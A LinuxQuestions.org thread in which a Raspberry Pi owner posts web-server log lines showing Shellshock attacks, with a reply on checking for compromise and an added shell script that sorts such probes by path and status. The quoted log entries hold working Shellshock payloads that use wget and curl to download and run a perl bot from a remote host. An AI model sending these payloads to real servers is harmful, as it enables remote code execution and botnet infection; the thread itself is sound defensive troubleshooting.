LinuxQuestions.org
Old 09-30-2014, 12:40 AM   #1
2damncommon
RasPi Homeserver Bash Attack


I am starting to see Bash attacks on my Raspberry Pi homeserver.

Code:
173.45.100.18___"GET /cgi-bin/hi HTTP/1.0" 404 489 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\""
82.221.128.246___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\""
54.251.83.67___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
Those are all in a row.

Other than knowing these are 200 rather than 404, I don't know what to make of it.

Do I unplug the server?

EDIT:
bash-count.txt says this:
This server is used for Internet security scans.
We are collecting data purely for research purposes and do
not mean to do any harm.


If you wish to opt out and make sure that we don't scan your
IP range again, please send us an email, and we will promptly
do so.


1. Send us an email with an IP range and organization name
E-mail to secscanoptout@gmail.com

173.45.100.18 = Columbus, Ohio
82.221.128.246 = Reykjavik, Hofuoborgarvaoio, Iceland (I have a Windows Virtual Machine running F-Prot AV ???)
54.251.83.67 = Singapore

Last edited by 2damncommon; 09-30-2014 at 01:00 AM. Reason: Additional info
 
Old 09-30-2014, 04:27 AM   #2
Habitual
Have a look at http://www.linuxquestions.org/questi...gs-4175520321/

If you haven't rebooted, run this:
Code:
ps -p $(pidof atd) -o lstart | tail -1 && last reboot | head -1
If atd has been running since about the time of the last reboot, I'd say you're safe from the jurat perlbot.

wget http://213.5.67.223/ji is another perlbot and it appears to connect (or try to connect) to ircd.w3h.co.uk

You should check your /usr/sbin/httpd and /usr/sbin/atd binaries for anything amiss.

jurat has been removed, probably after detection, so I can't examine it anymore, but still exists here...

I would block 46.16.170.158, 68.235.41.115, 213.5.67.223. I've seen bash-count.txt on my own server; I think it's the initial test of the target system for potential compromise, but that's just my opinion. I'm no unSpawn when it comes to these things.
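
Added example (not part of either post): a shell function that pulls requests carrying the `() {` function-definition prefix out of an Apache access log and labels each one by request path and status, the 200-versus-404 distinction the first post asks about. It assumes that only URLs under /cgi-bin/ or ending in .cgi/.sh reach a CGI handler on the server; the function names and the sample log lines (documentation-range addresses) are constructed for illustration.

```shell
#!/bin/sh
# Added example: triage Shellshock-style probes in an Apache access log.
# Assumption: only /cgi-bin/ URLs or *.cgi / *.sh paths are handled by CGI here.

# Constructed sample lines: two in the format quoted in the thread, two in
# Apache combined format. The last one is an ordinary request.
sample_log() {
    cat <<'EOF'
192.0.2.10___"GET /cgi-bin/hi HTTP/1.0" 404 489 "-" "() { :;}; /bin/bash -c \"echo probe\""
198.51.100.7___"GET / HTTP/1.1" 200 596 "-" "() { :;}; /bin/bash -c \"echo probe\""
203.0.113.5 - - [30/Sep/2014:00:40:00 -0700] "GET /cgi-bin/status.cgi HTTP/1.1" 200 120 "-" "() { :;}; echo probe"
203.0.113.9 - - [30/Sep/2014:00:41:00 -0700] "GET /index.html HTTP/1.1" 200 596 "-" "Mozilla/5.0"
EOF
}

# Reads log files given as arguments (or stdin) and prints
# "verdict client status path" for every line containing "() {".
#   not-found   : CGI-looking path, but 404, so no script existed to run
#   non-cgi     : path is not CGI-handled under the assumption above
#   investigate : CGI-looking path answered with something other than 404
shellshock_triage() {
    awk -F'"' '
    index($0, "() {") {
        # Field 1 is everything before the quoted request line; the client
        # address is its leading run of non-space, non-underscore characters.
        client = "?"
        if (match($1, /^[^ _]+/)) client = substr($1, RSTART, RLENGTH)
        split($2, req, " "); path = req[2]      # METHOD PATH PROTOCOL
        split($3, st, " ");  status = st[1]     # STATUS SIZE
        cgi = (path ~ /^\/cgi-bin\// || path ~ /\.(cgi|sh)([?]|$)/)
        if (!cgi)                  verdict = "non-cgi"
        else if (status == "404")  verdict = "not-found"
        else                       verdict = "investigate"
        print verdict, client, status, path
    }' "$@"
}

# Stand-alone use: pass log files as arguments, or run with none for the sample.
if [ "$#" -gt 0 ]; then
    shellshock_triage "$@"
else
    sample_log | shellshock_triage
fi
```

Lines labelled `investigate` are the ones to follow up with the process and binary checks suggested in the reply above.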
 
  


All times are GMT -5. The time now is 03:21 AM.
